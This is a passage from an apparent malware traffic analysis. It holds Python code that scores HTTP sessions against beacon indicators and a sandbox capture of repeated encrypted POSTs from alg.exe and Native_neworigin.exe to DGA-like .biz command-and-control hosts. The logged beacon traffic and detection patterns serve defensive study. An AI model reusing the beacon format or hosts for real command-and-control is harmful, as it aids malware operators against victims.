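        name, _, value = line.partition(":")
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return lines[0], headers

def payload_length_field(body_prefix: bytes) -> int | None:
    """Little-endian u32 at offset 8; equals Content-Length - 12 in every captured body."""
    return int.from_bytes(body_prefix[8:12], "little") if len(body_prefix) >= 12 else None

def dga_candidates(domains: list[str]) -> list[str]:
    """Domains whose shape matches the names this sample queried."""
    return [d for d in domains if DGA_HOST.match(d)]

def score_session(s: Session) -> list[str]:
    """Return the indicators this session matches; each maps to one visible feature."""
    req_line, req = parse_headers(s.request)
    status, resp = parse_headers(s.response)
    method, path, _ = req_line.split(" ", 2)
    host = req.get("host", [""])[0]
    clen = int(req.get("content-length", ["0"])[0])
    cookies = " ".join(resp.get("set-cookie", []))
    checks = [
        (method == "POST" and RANDOM_PATH.match(path), f"random POST path {path}"),
        (DGA_HOST.match(host), f"DGA-like host {host}"),
        (req.get("user-agent", [""])[0] == UA_IOC, "WindowsWechat/QQBrowser User-Agent"),
        (req.get("cache-control") == ["no-cache"] and req.get("pragma") == ["no-cache"],
         "Cache-Control and Pragma no-cache"),
        (any(b < 0x20 or b > 0x7E for b in s.body_prefix), "binary POST body"),
        (payload_length_field(s.body_prefix) == clen - 12,
         f"u32 at offset 8 == Content-Length - 12 ({clen - 12})"),
        (status.startswith("HTTP/1.1 200") and "btst=" in cookies and "snkz=" in cookies,
         "200 OK with btst/snkz cookies"),
    ]
    return [label for hit, label in checks if hit]

def is_beacon(s: Session, threshold: int = 4) -> bool:
    """Four independent indicators is the bar used here; the control scores zero."""
    return len(score_session(s)) >= threshold
```

Run it and every captured session scores at least six indicators (session 3 has no response in the excerpt) while the control scores none. The User-Agent string and the btst/snkz cookie pair are the most specific single features; the DGA and path regexes are deliberately narrow to this report and should be replaced by entropy or n-gram scoring before being used as a general rule. The length-field check is the one item to verify against full captures before relying on it.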


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
3           192.168.2.10  49764        18.141.10.107   80                6072  C:\Windows\System32\alg.exe

Timestamp / Bytes transferred / Direction, followed by the data sent:

Nov 26, 2024 08:12:32.809432030 CET  359 bytes  OUT
    POST /eupqxdgegqjrgdpv HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: ssbzmoy.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 778
Nov 26, 2024 08:12:32.809432030 CET  778 bytes  OUT
    Data Raw: 31 27 e9 e1 a9 f3 24 9a fe 02 00 00 1b 7f 13 bc ad 1c 7d e4 ec e4 80 c5 30 ec 19 74 07 22 c8 18 76 30 e1 f0 55 64 9e fc ab 24 89 9e f5 0f c3 56 cd 94 6d e7 a8 00 12 92 28 be 50 6e 95 79 0d 5c 76 7d 57 a8 6a 59 0e 0d 13 58 df a1 5f 4d 48 20 30 c7
    Data Ascii: 1'$}0t"v0Ud$Vm(Pny\v}WjYX_MH 0| ~MzH%#[Y?P 6Tzw+Z}SDhL{)}2FMAN0~yD1|t,!6xGdI[L#?+z@H-K7moH6r2n(Aj
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:34.923429966 CET409INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 26 Nov 2024 07:12:34 GMT
                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: btst=9383f00ee34fe5445dee990a00a20fee|8.46.123.75|1732605154|1732605154|0|1|0; path=/; domain=.ssbzmoy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.10 | 49766 | 54.244.188.177 | 80 | 3976 | C:\Users\user\AppData\Local\Temp\Native_neworigin.exe

Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 08:12:33.631994009 CET | 345 | OUT | POST /irvq HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: cvgrf.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 836
Nov 26, 2024 08:12:33.631994009 CET | 836 | OUT | Data Raw: c0 87 57 a9 dd 77 f9 b2 38 03 00 00 f8 f7 86 c5 d8 92 9c b0 52 81 e7 4f ff ad f0 5f fe 26 43 0f ab 79 44 ce 10 53 9d b2 6d ec 55 08 fa 4b 16 16 23 38 5d bb 7e a3 3e 07 77 60 3d 99 ae 07 b6 8a 8d 78 a6 06 87 3f 7a 73 fa d4 58 e6 75 ee 7c 59 f4 05
    Data Ascii: Ww8RO_&CyDSmUK#8]~>w`=x?zsXu|Y*GsbU$FcZ/Mx]x#d_oX7))!!F<R?Wbn=~tlH'kfO2B@%ZMoh+~N'{d&M=8_RJ|N
Nov 26, 2024 08:12:35.077266932 CET | 407 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 26 Nov 2024 07:12:34 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=d3d50c9665f8901934285aeddd7bf29d|8.46.123.75|1732605154|1732605154|0|1|0; path=/; domain=.cvgrf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.10 | 49772 | 54.244.188.177 | 80 | 6072 | C:\Windows\System32\alg.exe

Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 08:12:35.924395084 CET | 342 | OUT | POST /s HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: cvgrf.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 778
Nov 26, 2024 08:12:35.924443960 CET | 778 | OUT | Data Raw: bf 59 06 80 bd 78 a1 0c fe 02 00 00 80 0b e1 47 29 b2 b8 34 4c e4 e8 db b9 31 70 bf 68 a1 24 c7 2b fe fd b4 35 97 98 14 fc ae d6 5c 32 0c 38 eb 01 59 99 5b 4a de 74 8c f0 8e 81 92 46 c0 64 3b 42 3a c6 17 d3 85 96 f3 c6 8d fe 6b e9 38 0c 8b 58 b1
    Data Ascii: YxG)4L1ph$+5\28Y[JtFd;B:k8XI>_Kf:5'KBO^4cC< +n%#lTZC\**4jPY[zqT.[qN2>h:o<DZ5@xVJ]f;]#*fQrF
Nov 26, 2024 08:12:37.326651096 CET | 407 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 26 Nov 2024 07:12:37 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=21a31861624bc143b77e8a1a62416b6f|8.46.123.75|1732605157|1732605157|0|1|0; path=/; domain=.cvgrf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.10 | 49773 | 44.221.84.105 | 80 | 3976 | C:\Users\user\AppData\Local\Temp\Native_neworigin.exe

Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 08:12:36.104492903 CET | 358 | OUT | POST /xwcotmorefmmtc HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: npukfztj.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 836
Nov 26, 2024 08:12:36.104509115 CET | 836 | OUT | Data Raw: 72 8d 67 ca 7b c8 f5 a5 38 03 00 00 59 e5 3f b2 c6 24 64 d1 ff d3 e9 6a 96 eb 9d 37 1a dc 7f fd a2 90 e5 63 ad b7 7b cc 6d ea d1 3c ac 89 6f 57 40 74 87 5a 5f ac 4d 85 e9 49 8a e3 9b 4d fe 64 56 d7 fe 33 88 f9 5c 47 38 d3 25 40 40 03 d5 dd 2c a6
    Data Ascii: rg{8Y?$dj7c{m<oW@tZ_MIMdV3\G8%@@,t0:S-NrvY6Z1'kQb)M+,n{ulA=v4S`vyT4ke@1u2A+;qV_5~puF1u`$
Nov 26, 2024 08:12:37.297108889 CET | 410 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 26 Nov 2024 07:12:37 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=fd5150f49649d957bc955618d4876401|8.46.123.75|1732605157|1732605157|0|1|0; path=/; domain=.npukfztj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.10 | 49780 | 172.234.222.143 | 80 | 3976 | C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 08:12:38.366269112 CET | 355 | OUT | POST /kgrfegimyutt HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: przvgke.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 836
Nov 26, 2024 08:12:38.366298914 CET | 836 | OUT | Data Raw: 20 1d bc 4e b7 ce 87 94 38 03 00 00 db eb fd 4f 97 c1 06 27 65 cc 60 d0 f5 16 80 d4 c2 8b a4 5d 54 df 03 8a 79 8e 27 64 67 2e 11 43 19 20 01 dd 8c cd fd d5 a0 5c 06 70 90 65 6e af e5 2e 3c e2 ca fc a8 a1 21 35 9e 9f 66 17 45 fa 4a f0 6d 8b 1e 2c
    Data Ascii: N8O'e`]Ty'dg.C \pen.<!5fEJm,4AM.<GZ3[w0.1SF" rFg{M;Ti@[XwM2s~:#)h lF%F8o*MB;XlUl!K7G7vqV'gf:mOE$


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.10 | 49781 | 44.221.84.105 | 80 | 6072 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 08:12:39.250987053 CET | 353 | OUT | POST /rvwdmrjan HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: npukfztj.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 778
Nov 26, 2024 08:12:39.251013041 CET | 778 | OUT | Data Raw: 16 7c 99 89 52 d8 90 bc fe 02 00 00 c2 df 7f 65 63 22 c5 9d 55 f1 fd d5 80 5b 2d db 29 f9 d2 d4 d0 cd 90 6d 53 89 ab 36 5f 98 f6 5e ad 7a 37 f1 56 ba b2 b1 c4 98 24 f2 aa 1f e0 f7 59 be 50 c4 7a e8 85 47 cb 0c cc 42 d8 13 3f c2 48 ec 9d 65 95 c8
    Data Ascii: |Rec"U[-)mS6_^z7V$YPzGB?HePd}^ZaLF'ke1"aYfpNv!X45H7k/AX^#ZGG5 [sz#Bz\FgWND;_)}P
Nov 26, 2024 08:12:40.394444942 CET | 410 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 26 Nov 2024 07:12:40 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=c65e8317dfbf4af1b1b9407257f3bc90|8.46.123.75|1732605160|1732605160|0|1|0; path=/; domain=.npukfztj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.10 | 49782 | 172.234.222.143 | 80 | 3976 | C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 08:12:39.803112984 CET | 348 | OUT | POST /mbuec HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: przvgke.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 836
Nov 26, 2024 08:12:39.803149939 CET | 836 | OUT | Data Raw: 64 1b 64 6c 1c 60 8b 55 38 03 00 00 4b 63 5c a7 0d ab d9 dc d6 56 87 c1 e4 41 80 66 2a 95 76 d4 1b c2 0a 82 07 c9 ac 3b 82 00 b2 6e a6 da 62 f7 b8 3d 86 97 ca e2 a8 22 87 81 ec 7e a4 eb ac 1e 54 b6 9e f2 cf 1c 5a ad 22 41 62 78 c4 d1 26 96 67 3e
    Data Ascii: ddl`U8Kc\VAf*v;nb="~TZ"Abx&g>#i})PQW,KX!G~+&+_ ll2~y;~"D5y{fAe|!">STDYd&*OShG8:


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.10 | 49788 | 172.234.222.143 | 80 | 6072 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 08:12:41.513254881 CET | 346 | OUT | POST /avc HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: przvgke.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 778
Nov 26, 2024 08:12:41.513278961 CET | 778 | OUT | Data Raw: b0 bd 0a 75 2b 58 52 90 fe 02 00 00 53 c3 bb b6 f0 3c 0d 42 2f e7 cd d6 b8 8c 40 2d 96 ff fc ba 2e 27 e5 19 d6 fe 78 83 57 43 9b 2a 20 e9 be ee fd c5 9f a1 cd 88 e0 2d d4 90 af 6e 2b d6 4a a5 14 b5 61 64 09 67 54 e5 bb 4c 47 56 40 b2 f1 12 e9 d2
    Data Ascii: u+XRS<B/@-.'xWC* -n+JadgTLGV@@#*h OMr~C2bh;1K4\+469kh@99MU|z@UtT+Wo[M"eDOb3e8oP}8IQ9c


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.10 | 49790 | 18.141.10.107 | 80 | 3976 | C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 08:12:42.421621084 CET | 348 | OUT | POST /qmpy HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: knjghuig.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 836
Nov 26, 2024 08:12:42.421621084 CET | 836 | OUT | Data Raw: 7f de 79 2f 6a cf d0 f0 38 03 00 00 2f 07 e3 53 b8 cc ed 31 da 63 56 1d e6 e7 7b 68 c4 2f 5b 87 62 ad 6d 2f 8d 2e 6e 33 3a 77 b2 5f 70 0c 36 24 43 ca f3 d1 44 cc 3f 42 84 d5 0c 2c 9e 04 2e 99 99 b5 d1 73 8d a7 e3 dc a3 ab 60 2f c0 5f d8 37 f0 c5
    Data Ascii: y/j8/S1cV{h/[bm/.n3:w_p6$CD?B,.s`/_7@Z&?g1{?A?Zfg$^>_5~_;2(bA}zwL<X2b=$Rm^D{L+>&iX-%
Nov 26, 2024 08:12:44.585103035 CET | 410 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 26 Nov 2024 07:12:44 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=e344f1409f05f3996938736ae49ae0ed|8.46.123.75|1732605164|1732605164|0|1|0; path=/; domain=.knjghuig.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.10 | 49797 | 172.234.222.143 | 80 | 6072 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 08:12:45.742147923 CET | 358 | OUT | POST /blhkiobysomvisx HTTP/1.1
  Cache-Control: no-cache
  Connection: Keep-Alive
  Pragma: no-cache
  Host: przvgke.biz
  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
  Content-Length: 778
Nov 26, 2024 08:12:45.742712975 CET | 778 | OUT | Data Raw: fe 01 4d 9c 8a e4 56 ae fe 02 00 00 31 f6 95 d8 f6 f9 39 82 97 ef 27 23 ca dc d8 9e 12 d7 90 e2 e0 dd 06 57 ca 43 ca ca 48 94 fe 8f 3a 5f 89 b6 95 23 be 9d 2e 3e 6f a5 a7 73 f6 b0 db 79 47 c6 41 01 bd 55 02 bf ff 57 e4 ab 5d 16 13 2d 1e 02 a1 77
  Data Ascii: MV19'#WCH:_#.>osyGAUW]-w 'P;bNTKEvxhqS NX_AYw\&!+`=aN=_JOYTFI2M_^MOBF^M<wWask`xp~"TK


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.10 | 49803 | 18.141.10.107 | 80 | 6072 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 08:12:48.107767105 CET | 358 | OUT | POST /aatpwqmmnwrfjm HTTP/1.1
  Cache-Control: no-cache
  Connection: Keep-Alive
  Pragma: no-cache
  Host: knjghuig.biz
  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
  Content-Length: 778
Nov 26, 2024 08:12:48.108041048 CET | 778 | OUT | Data Raw: c5 77 32 3b 61 5d 92 20 fe 02 00 00 b5 97 0f e4 89 9b 70 97 07 7d 92 7d af 2d a6 0a 0e a0 1d 4d 0c bb c9 fc 23 f7 0f a4 5e 37 45 88 40 78 77 9c 85 41 a0 1b bb 73 dc 9f f4 f3 58 02 c8 43 6b 2f 2a e8 35 b5 68 c8 54 e1 3c 78 d0 22 13 12 eb 70 b8 29
  Data Ascii: w2;a] p}}-M#^7E@xwAsXCk/*5hT<x"p)O"?n\S6$(=7A(n(vM QGP=x/sIY#`yJ`-2<jy,vgz~&jErgGJ[u<S*eoP[U.y~+]l]E_lN
Nov 26, 2024 08:12:50.105474949 CET | 410 | IN | HTTP/1.1 200 OK
  Server: nginx
  Date: Tue, 26 Nov 2024 07:12:49 GMT
  Content-Type: text/html
  Transfer-Encoding: chunked
  Connection: close
  Set-Cookie: btst=7c27b64cfccfbe7f3c07d1ec72051b8d|8.46.123.75|1732605169|1732605169|0|1|0; path=/; domain=.knjghuig.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
  Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
  Data Raw: 30 0d 0a 0d 0a
  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.10 | 49814 | 82.112.184.197 | 80 | 6072 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 08:12:52.546036959 CET | 349 | OUT | POST /hrkmkab HTTP/1.1
  Cache-Control: no-cache
  Connection: Keep-Alive
  Pragma: no-cache
  Host: lpuegx.biz
  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
  Content-Length: 778
Nov 26, 2024 08:12:52.546060085 CET | 778 | OUT | Data Raw: 12 23 f5 1f a9 24 db f3 fe 02 00 00 d2 aa be a5 56 9c 8f 36 bd 23 7a 72 ab f5 2a 48 72 59 67 5c 0a 8c 2b 3d 94 8d 37 1e 40 2d 21 df 42 fc 28 a8 a9 99 c5 69 b5 0d 38 15 85 e6 19 25 72 da e5 a8 c5 7f c2 47 4f ca 5a 58 42 a4 9a 38 e9 71 4d 2a 29 6e
  Data Ascii: #$V6#zr*HrYg\+=7@-!B(i8%rGOZXB8qM*)nGVo|o]o~:\#z.L}=;vxl@jNTn1.)c/Zgc/3$GF<msBTPbnI"Q


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.10 | 49831 | 54.244.188.177 | 80 | 7892 | C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 08:13:00.691529036 CET | 358 | OUT | POST /tkvpxcpexicoa HTTP/1.1
  Cache-Control: no-cache
  Connection: Keep-Alive
  Pragma: no-cache
  Host: pywolwnvd.biz
  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
  Content-Length: 834
Nov 26, 2024 08:13:00.691556931 CET | 834 | OUT | Data Raw: e6 3f 48 e0 2c 7c a0 ec 36 03 00 00 8a fc 58 a7 a6 70 7f 7f 2b 3b a9 db af 87 f7 a0 66 83 d8 7f 78 de 46 ee 24 b9 bc eb 4f 6a 26 4c a1 f9 2d eb b3 19 ee b6 98 71 96 9c dc db f5 b7 ee d2 a7 38 fa b3 59 4d 56 97 85 af a9 64 23 76 b7 f9 82 39 68 2a
  Data Ascii: ?H,|6Xp+;fxF$Oj&L-q8YMVd#v9h*~NmDMR(,eby-Oqh-'irrF8FPu~11Pt!+24.E>Kr`'D/,J&ZM0:8Yb|P;LCD
Nov 26, 2024 08:13:02.146298885 CET | 411 | IN | HTTP/1.1 200 OK
  Server: nginx
  Date: Tue, 26 Nov 2024 07:13:01 GMT
  Content-Type: text/html
  Transfer-Encoding: chunked
  Connection: close
  Set-Cookie: btst=213b0bde1cbf9ebf8bae22d303658ff7|8.46.123.75|1732605181|1732605181|0|1|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
  Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
  Data Raw: 30 0d 0a 0d 0a
  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.10 | 49833 | 18.141.10.107 | 80 | 7892 | C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 08:13:02.508841991 CET | 350 | OUT | POST /bmgwtyy HTTP/1.1
  Cache-Control: no-cache
  Connection: Keep-Alive
  Pragma: no-cache
  Host: ssbzmoy.biz
  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
  Content-Length: 834
Nov 26, 2024 08:13:02.508841991 CET | 834 | OUT | Data Raw: 06 cc e7 04 50 b5 1a de 36 03 00 00 69 90 1c e8 51 86 5e da 21 53 69 b7 c1 dc 06 e4 6b 2f f7 44 6e 77 f2 6d c2 e0 d3 7f 0e 84 79 5a 05 89 74 3d f1 b9 1a 1d f8 af 4f 8b 12 f5 16 44 8e 1d 5b 00 f7 c6 b2 96 a4 81 f0 2d 37 90 c4 5c 12 ef 2f ae 81 80
  Data Ascii: P6iQ^!Sik/DnwmyZt=OD[-7\/~0fo=##y._F\Bwv`uO(S!6'Fc0ddes1-ugMfbt#Bi=F'B;{nNUJD28XNX
Nov 26, 2024 08:13:04.633460045 CET | 409 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 26 Nov 2024 07:13:04 GMT
                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: btst=3e20e614ffb57b55ecc3891ac6585cf5|8.46.123.75|1732605184|1732605184|0|1|0; path=/; domain=.ssbzmoy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.10 | 49839 | 54.244.188.177 | 80 | 7892 | C:\Users\user\AppData\Local\Temp\Native_neworigin.exe

Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 08:13:04.933401108 CET | 354 | OUT | POST /ghffopumxhoiq HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: cvgrf.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 834
Nov 26, 2024 08:13:04.933435917 CET | 834 | OUT | Data Raw: ec cc b6 86 db 41 ce 1a 36 03 00 00 b3 c0 b4 4d 39 6d 7d d3 d1 72 0a 1e 4b ae 22 4b 79 3b 0d ec 71 be a6 95 d7 f1 74 45 93 61 46 7a 44 d4 02 16 a4 d8 97 d8 56 7d 55 cd 50 79 ab a8 d2 c4 b2 17 9e 6c af 3a 42 83 d1 bb 4c 80 4c 11 71 c2 8a 39 73 96
    Data Ascii: A6M9m}rK"Ky;qtEaFzDV}UPyl:BLLq9s =32^>T<l#[7u{(:gQg\^+s!i146(x!D&^ux/1?!Af4 %!uDep,?l3I-tj
Nov 26, 2024 08:13:06.385684013 CET | 407 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 26 Nov 2024 07:13:06 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=aaf51ac5adc1a43092422c7e2cfc1d24|8.46.123.75|1732605186|1732605186|0|1|0; path=/; domain=.cvgrf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
